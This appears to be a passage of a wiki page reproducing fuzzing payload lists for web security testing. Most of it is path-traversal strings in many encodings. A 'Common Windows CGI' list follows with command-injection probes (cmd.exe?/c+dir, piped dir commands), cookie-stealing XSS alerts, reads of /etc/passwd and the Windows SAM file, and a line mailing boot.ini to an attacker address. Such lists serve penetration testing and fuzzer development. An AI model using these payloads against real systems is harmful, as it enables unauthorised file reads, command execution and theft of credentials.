0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
